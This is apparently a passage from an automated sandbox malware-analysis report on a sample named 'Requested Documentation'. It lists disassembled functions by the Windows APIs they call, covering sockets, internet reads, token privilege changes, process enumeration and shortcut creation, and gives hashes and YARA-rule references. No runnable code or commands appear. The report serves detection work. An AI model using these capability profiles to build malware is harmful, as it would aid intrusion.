                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                              • String ID:
                                                                              • API String ID: 1300846289-0
                                                                              • Opcode ID: 15aded07d1cfce0731c6436245eb1a4f4b7d4d7385e081588e0174bc8b5936f2
                                                                              • Instruction ID: 35b169e46b8b9fc8796f0d7103344d16cc07198aa3dc92192e557289e88c0f42
                                                                              • Opcode Fuzzy Hash: 15aded07d1cfce0731c6436245eb1a4f4b7d4d7385e081588e0174bc8b5936f2
                                                                              • Instruction Fuzzy Hash: 1A02C270A00205DBCF04DFA8D981BAEBBB5FF85300F65846AE80ADB355EB35D951CB91
                                                                              Function 00981287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00982612: GetWindowLongW.USER32(?,000000EB), ref: 00982623
                                                                              • DefDlgProcW.USER32(?,?,?,?,?), ref: 009819FA
                                                                              • GetSysColor.USER32(0000000F), ref: 00981A4E
                                                                              • SetBkColor.GDI32(?,00000000), ref: 00981A61
                                                                                • Part of subcall function 00981290: DefDlgProcW.USER32(?,00000020,?), ref: 009812D8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ColorProc$LongWindow
                                                                              • String ID:
                                                                              • API String ID: 3744519093-0
                                                                              • Opcode ID: a0cfb83ac223f2bacc4c3bf0f01655df386d46533b28021aebd7faa8d4f0e598
                                                                              • Instruction ID: d3e3ce2a4489e55f6b66f4ffd25187a94a1280fee0aca60ecf082bcbc2a3e1eb
                                                                              • Opcode Fuzzy Hash: a0cfb83ac223f2bacc4c3bf0f01655df386d46533b28021aebd7faa8d4f0e598
                                                                              • Instruction Fuzzy Hash: F4A14B71102548FFE72CBB28DD44EBF359CDB82365B140A1AF502D63E2DA699D0393B1
                                                                              Function 009EBCBC Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 009EBCE6
                                                                              • _wcscmp.LIBCMT ref: 009EBD16
                                                                              • _wcscmp.LIBCMT ref: 009EBD2B
                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 009EBD3C
                                                                              • FindClose.KERNEL32(00000000,00000001,00000000), ref: 009EBD6C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Find$File_wcscmp$CloseFirstNext
                                                                              • String ID:
                                                                              • API String ID: 2387731787-0
                                                                              • Opcode ID: 8ff048899f0d67c3f9757e1f80850c33eb7c3d1cac9b0c90b9128152fc065488
                                                                              • Instruction ID: 46242d4b9e936d4acd2a30cd374a908a513247b1b1305fa82a8c4416bfa99df4
                                                                              • Opcode Fuzzy Hash: 8ff048899f0d67c3f9757e1f80850c33eb7c3d1cac9b0c90b9128152fc065488
                                                                              • Instruction Fuzzy Hash: 9C51CE756046029FC715DF68D890EAAB3E8FF8A320F14461DF95A8B3A1DB30ED45CB91
                                                                              Function 009F6747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 009F7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 009F7DB6
                                                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 009F679E
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 009F67C7
                                                                              • bind.WSOCK32(00000000,?,00000010), ref: 009F6800
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 009F680D
                                                                              • closesocket.WSOCK32(00000000,00000000), ref: 009F6821
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                              • String ID:
                                                                              • API String ID: 99427753-0
                                                                              • Opcode ID: 0e0ed3fc16ae94b29f29de450b0fe1c07c62fe45a93e8d14f7c9755290ad1688
                                                                              • Instruction ID: 336d59ba67a1272f0d673117fdfdfbf4838dbd61df9150dcbbba3bc6c36803a9
                                                                              • Opcode Fuzzy Hash: 0e0ed3fc16ae94b29f29de450b0fe1c07c62fe45a93e8d14f7c9755290ad1688
                                                                              • Instruction Fuzzy Hash: D741A175A00214AFDB50FF648C86F7E77A8DF89714F48845CFA1AAB3D2CA74AD018791
                                                                              Function 00A05376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                              • String ID:
                                                                              • API String ID: 292994002-0
                                                                              • Opcode ID: 5c7bf7f2897f341c041e9831c65949fb9353a87304659b8f1c1bbf3cd6891df9
                                                                              • Instruction ID: 5a35a0d6c1a61fab20b93eb9d00c8b6adeb30110a380b6ba407345bb09f3232d
                                                                              • Opcode Fuzzy Hash: 5c7bf7f2897f341c041e9831c65949fb9353a87304659b8f1c1bbf3cd6891df9
                                                                              • Instruction Fuzzy Hash: 1411B631B009195FD731AF76EC54B6B7B99EF847A1B444029F846D7281CB70DC02CEA5
                                                                              Function 009D80A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009D80C0
                                                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009D80CA
                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009D80D9
                                                                              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009D80E0
                                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009D80F6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                              • String ID:
                                                                              • API String ID: 44706859-0
                                                                              • Opcode ID: 76ecbafbf2d5e49caadbfa3bd9ed2b8659158ce9ce615c5c8026372b4518276f
                                                                              • Instruction ID: cc7e9a9a8df6b4f026ea9dde3d935c45796461c7d1c79df5bbd0ceaadf3ef482
                                                                              • Opcode Fuzzy Hash: 76ecbafbf2d5e49caadbfa3bd9ed2b8659158ce9ce615c5c8026372b4518276f
                                                                              • Instruction Fuzzy Hash: D4F06231258308AFEB308FA5EC8DE673BACEF49B55B004136FA45D6251DB619C47DA60
                                                                              Function 009EC397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CoInitialize.OLE32(00000000), ref: 009EC432
                                                                              • CoCreateInstance.OLE32(00A12D6C,00000000,00000001,00A12BDC,?), ref: 009EC44A
                                                                                • Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22
                                                                              • CoUninitialize.OLE32 ref: 009EC6B7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                              • String ID: .lnk
                                                                              • API String ID: 2683427295-24824748
                                                                              • Opcode ID: 8d0a24a577ae89d78f44fbf26203b0f24d0ed47b3435b39b643f61b40aae4d71
                                                                              • Instruction ID: 2f258f66794074f278214c01801fc2ee24f25a01d6a05ae554d2bb5bcee3faca
                                                                              • Opcode Fuzzy Hash: 8d0a24a577ae89d78f44fbf26203b0f24d0ed47b3435b39b643f61b40aae4d71
                                                                              • Instruction Fuzzy Hash: 19A14B71104205AFD700EF54C881EABB7E8FFC4358F44491DF5969B2A2DB71EA49CB62
                                                                              Function 00984B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00984AD0), ref: 00984B45
                                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00984B57
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                                                              • API String ID: 2574300362-192647395
                                                                              • Opcode ID: 6f8f40db6d255b4ea62a92d2a4797ffd6a79b1fd32c2d757338cbb7b5a228b04
                                                                              • Instruction ID: 92aa80df3787acbd13f986c52c86461a5a4d7b7c324285908ef4fdd560df5376
                                                                              • Opcode Fuzzy Hash: 6f8f40db6d255b4ea62a92d2a4797ffd6a79b1fd32c2d757338cbb7b5a228b04
                                                                              • Instruction Fuzzy Hash: 0BD01234A1071BDFD730EF71E818B0676D8BF05351B11CC3A9485E6A90E670D481CB54
                                                                              Function 00993030 Relevance: 6.6, APIs: 4, Instructions: 587COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: __itow__swprintf
                                                                              • String ID:
                                                                              • API String ID: 674341424-0
                                                                              • Opcode ID: edc5c3766d02865d63d94d480d17741887decb65246dc2026076371be6dd6155
                                                                              • Instruction ID: 251a754f0cc748dfbb0e209c9a73706d1d3eb58103638e244ee5ba69f7b6ddf0
                                                                              • Opcode Fuzzy Hash: edc5c3766d02865d63d94d480d17741887decb65246dc2026076371be6dd6155
                                                                              • Instruction Fuzzy Hash: 68227A716083019FCB24EF18C881B6EB7E4AFC9314F54891DF89A97291DB75E904CB92
                                                                              Function 009FEE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 009FEE3D
                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 009FEE4B
                                                                                • Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22
                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 009FEF0B
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?), ref: 009FEF1A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                              • String ID:
                                                                              • API String ID: 2576544623-0
                                                                              • Opcode ID: 828a6ebe043642d440aa162c509f559ad984eac13bc913631bda8bc9fe4f4bc9
                                                                              • Instruction ID: 9e118523b17b32bc9f6ab4566710d66c8d19301cda0d97d8eb1dd7e6090ba426
                                                                              • Opcode Fuzzy Hash: 828a6ebe043642d440aa162c509f559ad984eac13bc913631bda8bc9fe4f4bc9
                                                                              • Instruction Fuzzy Hash: CA517B71504305AFD320EF24DC81F6BB7E8EF98710F50482DF595962A1EB70E909CB92
                                                                              Function 0098FCE0 Relevance: 5.5, APIs: 3, Instructions: 1040COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharUpper
                                                                              • String ID:
                                                                              • API String ID: 3964851224-0
                                                                              • Opcode ID: 785372f8690ce1f9aca6c592910bd974dbc2c13ba88b33ef22bb3e781b58fffc
                                                                              • Instruction ID: 76e1181f2f4c2685655f306a3d253434e85267fc1791f03b9cc44aef6ad73287
                                                                              • Opcode Fuzzy Hash: 785372f8690ce1f9aca6c592910bd974dbc2c13ba88b33ef22bb3e781b58fffc
                                                                              • Instruction Fuzzy Hash: 27926B74A083419FDB20DF18C490B2AB7E5BFC9304F14896DE89A9B362D775EC45CB92
                                                                              Function 009DE616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 009DE628
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: lstrlen
                                                                              • String ID: ($|
                                                                              • API String ID: 1659193697-1631851259
                                                                              • Opcode ID: 22030b4a780c50f5c409ee36ae3766cdef31c4e49618a5aef834f5fdd3722232
                                                                              • Instruction ID: 746a0c0e65592fcf4ddcd4c6e6471cf698e4c1f28ceb993b3bedfff6f40ad750
                                                                              • Opcode Fuzzy Hash: 22030b4a780c50f5c409ee36ae3766cdef31c4e49618a5aef834f5fdd3722232
                                                                              • Instruction Fuzzy Hash: B2323575A407059FDB28DF19C481AAAB7F0FF48320B15C56EE89ADB3A1E770E941CB44
                                                                              Function 009F22EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,009F180A,00000000), ref: 009F23E1
                                                                              • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 009F2418
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Internet$AvailableDataFileQueryRead
                                                                              • String ID:
                                                                              • API String ID: 599397726-0
                                                                              • Opcode ID: ccd106408f1bd49fd640170dfea7a392f86e121cc1efa729ae4844440c1718e3
                                                                              • Instruction ID: a0c6ee95032fed8390d97683732f4c2ab39253f900e2c2cdbc35137d9a053183
                                                                              • Opcode Fuzzy Hash: ccd106408f1bd49fd640170dfea7a392f86e121cc1efa729ae4844440c1718e3
                                                                              • Instruction Fuzzy Hash: DD41D6B160420DBFEB20DF95DC85FBBB7ADEB80714F10442AF705A6150DAB99E419750
                                                                              Function 009EB3FB Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 009EB40B
                                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 009EB465
                                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 009EB4B2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$DiskFreeSpace
                                                                              • String ID:
                                                                              • API String ID: 1682464887-0
                                                                              • Opcode ID: b34ea55e1ebad4a4ff79f6989ebf9308e05c5613ec25b4a45a524f213c555d22
                                                                              • Instruction ID: bb799e6fe2576cc47647d3ae3484a3e310b8fe44df334376ae0ee7c3087cc5f9
                                                                              • Opcode Fuzzy Hash: b34ea55e1ebad4a4ff79f6989ebf9308e05c5613ec25b4a45a524f213c555d22
                                                                              • Instruction Fuzzy Hash: CA214435A00108DFCB00EF95D884AEEBBB8FF89314F1480AAE905EB361DB319D56CB51
                                                                              Function 009D87E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 009A0DB6: std::exception::exception.LIBCMT ref: 009A0DEC
                                                                                • Part of subcall function 009A0DB6: __CxxThrowException@8.LIBCMT ref: 009A0E01
                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009D882B
                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 009D8858
                                                                              • GetLastError.KERNEL32 ref: 009D8865
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                              • String ID:
                                                                              • API String ID: 1922334811-0
                                                                              • Opcode ID: 52735bd14c3f13380bf0cd0c476bbfcf0ac7f384d01f0e8e65b82b9bdae60871
                                                                              • Instruction ID: 3c565849def26ce929d0f0a4404bc072391074483f48725567e3421f570046c5
                                                                              • Opcode Fuzzy Hash: 52735bd14c3f13380bf0cd0c476bbfcf0ac7f384d01f0e8e65b82b9bdae60871
                                                                              • Instruction Fuzzy Hash: DB1160B2414305AFE728DF94DC85D6BB7BDEB45710B20852EE45597641EA30BC418B60
                                                                              Function 009D874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 009D8774
                                                                              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 009D878B
                                                                              • FreeSid.ADVAPI32(?), ref: 009D879B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                              • String ID:
                                                                              • API String ID: 3429775523-0
                                                                              • Opcode ID: 487bd709ac0ea3c344561aa5752015bc4b567ad4a1b5808502e746b4ed37bf78
                                                                              • Instruction ID: e58dd1472638d25f280658f81ca81de400ea853d5396a142983629f6bf4a8890
                                                                              • Opcode Fuzzy Hash: 487bd709ac0ea3c344561aa5752015bc4b567ad4a1b5808502e746b4ed37bf78
                                                                              • Instruction Fuzzy Hash: 7CF04975E5130CBFDF00DFF4DC89AAEBBBCEF08701F1044A9A901E2681E6716A058B50
                                                                              Function 009EC6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 009EC6FB
